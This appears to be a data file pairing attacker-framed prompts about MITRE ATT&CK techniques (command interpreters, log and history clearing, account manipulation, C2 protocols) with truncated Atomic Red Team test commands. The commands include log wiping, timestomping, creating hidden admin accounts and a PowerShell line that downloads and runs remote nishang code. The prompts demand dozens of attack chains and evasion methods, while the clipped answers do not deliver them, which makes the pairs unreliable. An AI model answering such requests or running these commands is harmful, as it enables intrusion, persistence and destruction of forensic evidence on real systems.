# MITRE T1059.005: Command and Scripting Interpreter: Visual Basic ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Visual Basic script execution to gather local computer information **Executor**: powershell **Command**: ``` cscript "#{vbscript}" > $env:TEMP\T1059.005.out.tx...
ART
T1059.005
MITRE T1059.006: Command and Scripting Interpreter: Python: What are 4 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1059.006: Command and Scripting Interpreter: Python ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Execute shell script via python's command mode arguement **Executor**: sh **Command**: ``` which_python=$(which python || which python3 || which python3.9 || which p...
ART
T1059.006
MITRE T1059.007: Command and Scripting Interpreter: JavaScript — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1059.007: Command and Scripting Interpreter: JavaScript ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: JScript execution to gather local computer information via cscript **Executor**: command_prompt **Command**: ``` cscript "#{jscript}" > %tmp%\T1059.007.out.txt `...
ART
T1059.007
MITRE T1059.010: Command and Scripting Interpreter: AutoHotKey & AutoIT exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1059.010: Command and Scripting Interpreter: AutoHotKey & AutoIT ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: AutoHotKey script execution **Executor**: powershell **Command**: ``` Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}" ```
ART
T1059.010
Red team: MITRE T1069.001: Permission Groups Discovery: Local Groups. List 7 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1069.001: Permission Groups Discovery: Local Groups ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Permission Groups Discovery (Local) **Executor**: sh **Command**: ``` if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is mis...
ART
T1069.001
Attacker perspective on MITRE T1069.002: Permission Groups Discovery: Domain Groups: Give 15+ methods with step-by-step instructions and code samples.
# MITRE T1069.002: Permission Groups Discovery: Domain Groups ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Basic Permission Groups Discovery Windows (Domain) **Executor**: command_prompt **Command**: ``` net localgroup net group /domain net group "enterprise admins" /dom...
ART
T1069.002
Attacker perspective on MITRE T1070: Indicator Removal on Host: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1070: Indicator Removal on Host ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Indicator Removal using FSUtil **Executor**: command_prompt **Command**: ``` fsutil usn deletejournal /D C: ``` **Cleanup**: ``` fsutil usn createjournal m=1000 a=100 c: ``` ### Test 2...
ART
T1070
Attacker perspective on MITRE T1070.001: Indicator Removal on Host: Clear Windows Event Logs: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1070.001: Indicator Removal on Host: Clear Windows Event Logs ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Clear Logs **Executor**: command_prompt **Command**: ``` wevtutil cl #{log_name} ``` ### Test 2: Delete System Logs Using Clear-EventLog **Executor**: pow...
ART
T1070.001
TARGET: MITRE T1070.002: Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs. Provide 20 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1070.002: Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: rm -rf **Executor**: sh **Command**: ``` sudo rm -rf #{syslog_path} if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi ``` ##...
ART
T1070.002
TARGET: MITRE T1070.003: Indicator Removal on Host: Clear Command History. Provide 14 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1070.003: Indicator Removal on Host: Clear Command History ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Clear Bash history (rm) **Executor**: sh **Command**: ``` rm #{history_path} ``` ### Test 2: Clear Bash history (echo) **Executor**: sh **Command**: ``` echo...
ART
T1070.003
Attacker perspective on MITRE T1070.004: Indicator Removal on Host: File Deletion: Give 11+ methods with step-by-step instructions and code samples.
# MITRE T1070.004: Indicator Removal on Host: File Deletion ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Delete a single file - FreeBSD/Linux/macOS **Executor**: sh **Command**: ``` rm -f #{file_to_delete} ``` **Cleanup**: ``` rm -rf #{parent_folder} ``` ### Test 2: Del...
ART
T1070.004
Red team: MITRE T1070.005: Indicator Removal on Host: Network Share Connection Removal. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1070.005: Indicator Removal on Host: Network Share Connection Removal ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Add Network Share **Executor**: command_prompt **Command**: ``` net use c: #{share_name} net share test=#{share_name} /REMARK:"test share" /CACHE:N...
ART
T1070.005
MITRE T1070.006: Indicator Removal on Host: Timestomp exploitation: provide 10+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1070.006: Indicator Removal on Host: Timestomp ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Set a file's access timestamp **Executor**: sh **Command**: ``` touch -a -t 197001010000.00 #{target_filename} ``` **Cleanup**: ``` rm -f #{target_filename} ``` ### Test...
ART
T1070.006
Red team: MITRE T1070.008: Email Collection: Mailbox Manipulation. List 6 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1070.008: Email Collection: Mailbox Manipulation ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Copy and Delete Mailbox Data on Windows **Executor**: powershell **Command**: ``` New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemTy...
ART
T1070.008
Red team: MITRE T1071: Application Layer Protocol. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1071: Application Layer Protocol ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Telnet C2 **Executor**: powershell **Command**: ``` #{client_path} #{server_ip} --port #{server_port} ```
ART
T1071
Attacker perspective on MITRE T1071.001: Application Layer Protocol: Web Protocols: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1071.001: Application Layer Protocol: Web Protocols ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Malicious User Agents - Powershell **Executor**: powershell **Command**: ``` Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{...
ART
T1071.001
MITRE T1071.004: Application Layer Protocol: DNS exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1071.004: Application Layer Protocol: DNS ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: DNS Large Query Volume **Executor**: powershell **Command**: ``` for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}-$(Get-Random -Mi...
ART
T1071.004
Attacker perspective on MITRE T1072: Software Deployment Tools: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1072: Software Deployment Tools ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Radmin Viewer Utility **Executor**: command_prompt **Command**: ``` "%PROGRAMFILES(x86)%/#{radmin_exe}" ``` ### Test 2: PDQ Deploy RAT **Executor**: command_prompt **Command**: ``` "%P...
ART
T1072
MITRE T1074.001: Data Staged: Local Data Staging — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1074.001: Data Staged: Local Data Staging ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Stage data from Discovery.bat **Executor**: powershell **Command**: ``` Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.0...
ART
T1074.001
Red team: MITRE T1078.001: Valid Accounts: Default Accounts. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1078.001: Valid Accounts: Default Accounts ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Enable Guest account with RDP capability and admin privileges **Executor**: command_prompt **Command**: ``` net user #{guest_user} /active:yes net user #{guest_user} #{guest_...
ART
T1078.001
MITRE T1078.003: Valid Accounts: Local Accounts — Give 13 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1078.003: Valid Accounts: Local Accounts ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Create local account with admin privileges **Executor**: command_prompt **Command**: ``` net user art-test /add net user art-test #{password} net localgroup administrators art-...
ART
T1078.003
MITRE T1078.004: Valid Accounts: Cloud Accounts: What are 3 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1078.004: Valid Accounts: Cloud Accounts ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Creating GCP Service Account and Service Account Key **Executor**: sh **Command**: ``` gcloud config set project #{project-id} gcloud iam service-accounts create #{service-acco...
ART
T1078.004
MITRE T1082: System Information Discovery exploitation: provide 40+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1082: System Information Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: System Information Discovery **Executor**: command_prompt **Command**: ``` systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ``` ### Test 2: System Information D...
ART
T1082
MITRE T1083: File and Directory Discovery exploitation: provide 9+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1083: File and Directory Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: File and Directory Discovery (cmd.exe) **Executor**: command_prompt **Command**: ``` dir /s c:\ >> #{output_file} dir /s "c:\Documents and Settings" >> #{output_file} dir /s "c:\Prog...
ART
T1083
MITRE T1087.001: Account Discovery: Local Account exploitation: provide 11+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1087.001: Account Discovery: Local Account ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Enumerate all accounts (Local) **Executor**: sh **Command**: ``` cat /etc/passwd > #{output_file} cat #{output_file} ``` **Cleanup**: ``` rm -f #{output_file} ``` ### Test 2...
ART
T1087.001
MITRE T1090.001: Proxy: Internal Proxy exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1090.001: Proxy: Internal Proxy ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Connection Proxy **Executor**: sh **Command**: ``` export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port} curl #{test_url} ``` **Cleanup**: ``` unset #{proxy_scheme}_proxy [ "#{run_...
ART
T1090.001
Red team: MITRE T1090.003: Proxy: Multi-hop Proxy. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1090.003: Proxy: Multi-hop Proxy ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Psiphon **Executor**: powershell **Command**: ``` & "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" ``` **Cleanup**: ``` $Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ig...
ART
T1090.003
MITRE T1091: Replication Through Removable Media exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1091: Replication Through Removable Media ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: USB Malware Spread Simulation **Executor**: powershell **Command**: ``` $RemovableDrives=@() $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | ...
ART
T1091
MITRE T1095: Non-Application Layer Protocol exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1095: Non-Application Layer Protocol ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: ICMP C2 **Executor**: powershell **Command**: ``` IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09...
ART
T1095
Attacker perspective on MITRE T1098: Account Manipulation: Give 17+ methods with step-by-step instructions and code samples.
# MITRE T1098: Account Manipulation ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Admin Account Manipulate **Executor**: powershell **Command**: ``` $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 $z = Get-Random -Minimum 2 -Maximum 9999 ...
ART
T1098
TARGET: MITRE T1098.001: Account Manipulation: Additional Cloud Credentials. Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1098.001: Account Manipulation: Additional Cloud Credentials ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Azure AD Application Hijacking - Service Principal **Executor**: powershell **Command**: ``` Import-Module -Name AzureAD $PWord = ConvertTo-SecureString -St...
ART
T1098.001